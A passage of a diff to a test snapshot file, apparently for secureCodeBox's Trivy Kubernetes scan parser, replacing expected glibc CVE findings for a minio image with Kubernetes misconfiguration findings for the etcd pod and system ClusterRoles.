"scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, ], "severity": "LOW", @@ -115810,150 +115886,260 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", ], }, - "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.memory')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'etcd-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:cronjob-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:cronjob-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], "severity": "HIGH", @@ -115961,8835 +116147,10403 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:cronjob-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, - "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:cronjob-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", - }, - { - "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", - }, - { - "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", - }, - { - "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:deployment-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:deployment-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:deployment-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:deployment-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:endpoint-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpoint-controller", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpoint-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:endpointslice-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpointslice-controller", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpointslice-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:endpointslicemirroring-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpointslicemirroring-controller", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpointslicemirroring-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:generic-garbage-collector' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:generic-garbage-collector", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:expand-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:expand-controller", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:horizontal-pod-autoscaler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:horizontal-pod-autoscaler", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:job-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:job-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:namespace-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:namespace-controller", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - 